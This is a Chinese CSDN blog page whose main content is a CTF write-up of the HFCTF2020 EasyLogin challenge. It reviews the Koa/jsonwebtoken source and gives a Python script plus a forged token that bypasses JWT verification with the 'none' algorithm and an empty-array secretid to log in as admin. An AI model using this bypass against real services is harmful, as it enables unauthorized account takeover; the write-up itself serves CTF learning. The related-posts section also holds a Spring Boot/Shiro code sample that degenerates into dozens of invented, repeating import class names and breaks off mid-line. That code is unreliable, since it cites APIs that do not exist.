jwt(练习)

于 2022-10-14 16:00:03 发布
阅读量653 收藏
点赞数
文章标签: 服务器 servlet 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/127319993
版权

目录

[HFCTF2020]EasyLogin

第一部分

第二部分

 第三部分

第四部分

JWT一般由三部分组成,并使用base64编码

标头、payload、签名

标头由两部分组成:令牌的类型和所使用的签名算法

"alg":"HS256",        "typ":"JWT"

payload分为三种类型,注册的,公共的和私人权利 

jwt是什么

JWT(JSON Web Token)是一个包含签名数据结构的字符串,通常用于对用户进行身份验证。JWT包含一个加密签名,例如数据上的HMAC。因此,只有服务器可以创建和修改令牌。这意味着服务器可以安全地userid=123在令牌中,并将令牌交给客户端,而不必担心客户端更改其用户标识符。这样,身份验证可以是无状态的:服务器不必记住令牌或用户的任何信息,因为所有信息都包含在令牌中。 

JSON Web Tokens - jwt.io 官网,了解了以后我们可以刷题练习一下

[HFCTF2020]EasyLogin

打开界面以后,感觉是一道sql注入题目, 然后注册admin 发现已经被占用了,然后随机注册一个账号并登录

进入了以后,发现了一个查看flag的窗口,然后发现拒绝访问,这时候就想起了admin这个账号的作用,在登录框的时候抓一下包

 发现这是一个jwt,最明显的特征就是分成了三段,每一段用.连接

发现用了HS256编码,这时候有一个思路就是换成none的编码格式我们就可以把账户改为admin然后得到了权限就可以得到flag了

仅仅是有这个想法,但是不知道如何去实现,只能扒一下大佬们的wp了

 源码竟然有一个超链接,然后

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置?不管了先填个根目录XD
 */

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}
译

第一部分

const username = $("#username").val();
const password = $("#password").val();

意思就是通过val(),获得这个标签的value的值,赋值给你声明的变量 const username

第二部分

const token=sessionStorage.getItem("token")

 第三部分

$.post("/api/login", {username, password, authorization:token})

也就是使用post访问,前面为url,后面为参数。

第四部分

        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);

然后是done和fail方法,成功了就重定位到/home目录,失败了就返回异常信息。

        const {status} = data;

相当于 const status=this.state.status

查看WP发现,需要读取controllers/api.js

看了很多版本wp,都是据经验而言,先积累经验扒

查看/static/js/app.js,发现提示知道是koa框架

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

 koa框架下有controllers目录,controllers目录下存有api.js,url直接访问(/controllers/api.js)可得

利用方式

利用nodejs的jwt缺陷,当jwt的secret为空,jwt会采用algorithm为none进行解密。

js是弱语言类型,我们可以将secretid设置为一个小数或空数组(空数组与数字比较时为0)来绕过secretid的一个验证(不能为null&undefined)

if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) { throw new APIError('login error', 'no such secret id'); }

这样secrret为空,加密算法也为none,成功绕过jwt验证

import jwt
token = jwt.encode(
    {
        "secretid": [],
        "username": "admin",
        "password": "123456",
        "iat": 1665728024
    },
    algorithm="none", key="").decode(encoding='utf-8')
print(token)

iat换成自己的就可以,然后生成

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTY2NTcyODAyNH0.
登录的时候burp抓包,换一下

 

 然后抓包这个flag 界面,重发包获得flag

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
个人 尚硅谷React全家桶学习笔记(12)
qq_54022138的博客
01-22 394
个人 尚硅谷React全家桶学习笔记(十二) 32.react中的事件处理 1.通过onXxx属性指定事件 注意大小写(onClick) ​ a.React使用的是自定义事件,而不是原生DOM事件(为了更好的兼容性) ​ b.React中的时间是通过事件委托方式处理的(委托给组件最外层的元素 因为高效) 2.通过event.target得到发生时间的DOM元素对象(不要过度使用ref 发生事件的元素是要操作的元素就可以省略ref) 33.非受控组件 class Login extends React.C
react基础篇(三)
zz_zz33的博客
03-15 99
说明:“现用现取”的数据称为非受控组件,例如form表单中的输入dom,input radio等,都是提交表单的时候获取值的。说明:存放在state状态里面,等需要用到的时候,再从state里面取出来用,而不是“现取现用”函数柯里化:通过函数调用继续返回函数的方式,实现多次接收参数,最后统一处理的函数编码形式。概念: 如果一个函数符合下面两个规范中的任何一个,那该函数就是高阶函数。若A函数,调用的返回值依然是一个函数,那么A就可以称之为高阶函数。若A函数,接收的参数是一个函数,那么A就可以称之为高阶函数。
vue用token+sessionStorage实现前端持久化登录(包括前端路由拦截,请求拦截、响应拦截)
weixin_44022194的博客
07-14 1461
vue用token+sessionStorage实现前端持久化登录(包括前端路由拦截,请求拦截、响应拦截) onSuccess() { // 验证通过 //this.toLogin(); if (this.loginUser.username === "") { this.$message.warning("*用户名不能为空"); return; } if (this.loginUser.password === "
一天一道ctf 第55天(controllers/api.js JWT
scrawman的博客
08-18 383
审查元素发现是js框架且有app.js文件: 看了wp才知道要访问controllers/api.js,行吧就当积累经验了。 重点是这里: const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'}); jwt之前也遇到过了,我们可以抓包一个jwt然后解密出secret。注册一个账号然后登录,拿到令牌。 在https://jwt.io/这个网站上可以解析jwt 把加密方法改为none,us
golang基础(二):常量、类型、字符串常用操作
genziisme的专栏
03-26 1197
一、定义常量 const 定义常量,不可更改。可以一次性定义多个常量,但必须都要赋值。 package main import "fmt" func main() { const username = "张三" fmt.Println(username) // 定义多个常量 const ( username = "张三" age = 12 sex = "男" ) fmt.Print
SpringSecurity + JWT练习
08-21
SECURITY+JWT
基于Express的JWT身份验证练习
07-24
基于Express的JWT身份验证练习,在该项目中,将会引导你从创建Express服务器开始,导入过程中所需要的包,包括CORS,express-jwt,jsonwebtoken,以及解析数据的中间件body-parser,在本项目中,没有配置ul前端界面...
SpringBoot+SpringSecurity+JWT权限管理练习项目
最新发布
01-16
**SpringBoot+SpringSecurity+JWT权限管理练习项目详解** 在当今的Web开发中,权限管理和认证是不可或缺的部分,尤其对于企业级应用来说更是如此。本项目以SpringBoot为基础,结合SpringSecurity进行权限控制,并...
jwt_example
02-20
JWT(JSON Web Token)是一种开放的标准...这个项目可能包含了创建、验证 JWT 的示例代码,以及如何在 Web API 或 ASP.NET Core 应用中使用 JWT 的实战练习。通过研究这些内容,你可以深化对 JWT 和 C# 安全性的理解。
Restful-CRUD练习.zip
05-06
RESTful API需要考虑认证和授权,通常使用OAuth、JWT(JSON Web Tokens)等方式进行身份验证和权限管理。 9. **缓存机制**: RESTful设计允许客户端利用HTTP的缓存机制提高性能,如通过Cache-Control和ETag头来...
SpringCloud Gateway API接口安全设计(加密 、签名)
热门推荐
简单记录一下。
05-26 6万+
1、防止数据抓包窃取 1.1、风险简述 简述:当用户登录时,恶意攻击者可以用抓包工具可以拿到用户提交的表单信息,可以获取用户的账号密码,进而可以恶意访问网站。 1.2、RSA非对称加密 1.2.1、RSA简介 RSA加密算法是一种非对称加密算法。在公开密钥加密和电子商业中RSA被广泛使用。RSA是1977年由罗纳德·李维斯特(Ron Rivest)、阿迪·萨莫尔(Adi Shamir)和伦纳德·阿德曼(Leonard Adleman)一起提出的。当时他们三人都在麻省理工学院工作。RSA就.
ES6的声明 let,const,var区别
usernamecunzai的博客
03-23 97
1、let声明的变量只在let命令所在的代码块内有效,const声明一个只读的常量,常量一旦声明,就不可以被改变。 { let a = 0; a // 0 } a // 报错 ReferenceError: a is not defined let 是在代码块内有效,var 是在全局范围内有效 { let a = 0; var b = 1; } a // Ref...
Sail.js官方文档阅读笔记(二)——api/controllers/ 目录
wuqingdeqing的博客
12-03 458
Sails项目结构中api包包含了后端的主要逻辑。其中包含了多个主要目录: 2.1 api/controllers/ 此目录中的js文件包含了与models的交互逻辑与向客户端渲染视图。 2.1.1 总述 Actions是Sails应用中用来处理web请求的主要对象。 Actions和应用中的routes绑定,当用户请求一个URL时,被绑定的action会执行逻辑和响应。 2.1....
[HFCTF2020]EasyLogin
m0_62905261的博客
07-16 671
[HFCTF2020]EasyLogin
【vue】前端必须掌握的登陆 token 处理( Vue 登陆处理 token 的补充)
qq_41399901的博客
04-07 2万+
前言 前段时间用到了 token 处理登陆,简单弄了一下 https://blog.csdn.net/qq_41399901/article/details/88696054 在这里进行一次深入补充 token token 一般长这样: 426648ef200b455684cb15d6523a935e.d86c828583c5c6160e8acfee88ba1590 一串加密字符串 为了安全和方便...
uniapp封装token验证
weixin_43837268的博客
04-06 1万+
//带Token请求 const httpTokenRequest = (opts, data) => { let token = ""; uni.getStorage({ key: 'token', success: function(ress) { token = ress.data } }); //此token是登录成功后后台返回保存在storage中的 ...
ctf-hub web进阶(JWT)
h0ld1rs的博客
10-19 1744
敏感信息泄露 http://jwt.io 使用这个网站,把token进行加载即可 然后两部分拼接即可 无签名 none时侯,一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证 import jwt token = jwt.encode( { "username": "admin", "password": "admin", "role":"admin" }, algorithm="none",key="" ) print(token) 最后可以得到 e
JWT、OAuth 2.0、session 用户授权实战
weixin_34001430的博客
05-16 1517
在很多应用中,我们都需要向服务端提供自己的身份凭证来获得访问一些非公开资源的授权。比如在一个博客平台,我们要修改自己的博客,那么服务端要求我们能够证明 “我是我” ,才会允许我们修改自己的博客。 为用户提供授权以允许用户操作非公开资源,有很多种方式。比如使用 token、session、cookie,还有允许第三方登录授权的 OAuth 2.0. 为了理解这些技术的机制和它们之间的关系,本文...
springboot登录验证jwt
12-29
在Spring Boot中实现JWT登录验证可以结合Shiro和Redis来实现。下面是一个简单的示例代码: 1. 首先,需要添加相关依赖: ```xml <dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-spring-boot-starter</artifactId> <version>1.7.1</version> </dependency> <dependency> <groupId>io.jsonwebtoken</groupId> <artifactId>jjwt</artifactId> <version>0.9.1</version> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-redis</artifactId> </dependency> ``` 2. 创建一个JWT工具类,用于生成和解析JWT: ```java import io.jsonwebtoken.Claims; import io.jsonwebtoken.Jwts; import io.jsonwebtoken.SignatureAlgorithm; import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Component; import java.util.Date; @Component public class JwtUtils { @Value("${jwt.secret}") private String secret; @Value("${jwt.expiration}") private Long expiration; public String generateToken(String username) { Date now = new Date(); Date expireDate = new Date(now.getTime() + expiration * 1000); return Jwts.builder() .setSubject(username) .setIssuedAt(now) .setExpiration(expireDate) .signWith(SignatureAlgorithm.HS512, secret) .compact(); } public String getUsernameFromToken(String token) { Claims claims = Jwts.parser() .setSigningKey(secret) .parseClaimsJws(token) .getBody(); return claims.getSubject(); } public boolean validateToken(String token) { try { Jwts.parser().setSigningKey(secret).parseClaimsJws(token); return true; } catch (Exception e) { return false; } } } ``` 3. 创建一个自定义的Realm类,用于处理登录验证和权限控制: ```java import org.apache.shiro.authc.*; import org.apache.shiro.realm.AuthenticatingRealm; import org.springframework.beans.factory.annotation.Autowired; public class JwtRealm extends AuthenticatingRealm { @Autowired private JwtUtils jwtUtils; @Override public boolean supports(AuthenticationToken token) { return token instanceof JwtToken; } @Override protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { JwtToken jwtToken = (JwtToken) authenticationToken; String token = jwtToken.getToken(); if (!jwtUtils.validateToken(token)) { throw new IncorrectCredentialsException("Token无效"); } String username = jwtUtils.getUsernameFromToken(token); // TODO: 根据用户名查询用户信息 return new SimpleAuthenticationInfo(username, token, getName()); } } ``` 4. 创建一个自定义的Filter类,用于处理JWT的验证和授权: ```java import org.apache.shiro.web.filter.authc.BasicHttpAuthenticationFilter; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpStatus; import org.springframework.web.bind.annotation.RequestMethod; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; public class JwtFilter extends BasicHttpAuthenticationFilter { @Autowired private JwtUtils jwtUtils; @Override protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) { HttpServletRequest httpServletRequest = (HttpServletRequest) request; String token = httpServletRequest.getHeader("Authorization"); if (token != null && token.startsWith("Bearer ")) { token = token.substring(7); } if (jwtUtils.validateToken(token)) { return true; } throw new UnauthorizedException("Token无效"); } @Override protected boolean onAccessDenied(ServletRequest request, ServletResponse response) throws Exception { HttpServletResponse httpServletResponse = (HttpServletResponse) response; httpServletResponse.setStatus(HttpStatus.UNAUTHORIZED.value()); return false; } } ``` 5. 在Spring Boot的配置文件中配置相关参数: ```properties # JWT配置 jwt.secret=your_secret_key jwt.expiration=3600 ``` 6. 在Spring Boot的配置类中配置Shiro和Redis: ```java import org.apache.shiro.mgt.SecurityManager; import org.apache.shiro.realm.Realm; import org.apache.shiro.session.mgt.SessionManager; import org.apache.shiro.session.mgt.eis.EnterpriseCacheSessionDAO; import org.apache.shiro.session.mgt.eis.SessionDAO; import org.apache.shiro.session.mgt.eis.SessionIdGenerator; import org.apache.shiro.session.mgt.eis.SimpleSessionIdGenerator; import org.apache.shiro.session.mgt.eis.SessionIdCookie; import org.apache.shiro.session.mgt.eis.SessionIdCookieEnabled; import org.apache.shiro.session.mgt.eis.SessionIdCookieSessionFactory; import org.apache.shiro.session.mgt.eis.SessionIdUrlRewritingEnabled; import org.apache.shiro.session.mgt.eis.SessionManagerEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationScheduler; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerFactory; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactory; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionManager; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionManagerEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabledEnabled; import org.apache.shiro.session.mgt.eis.SessionValidationSchedulerSessionFactoryEnabledEnabledEnabledEnabled
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值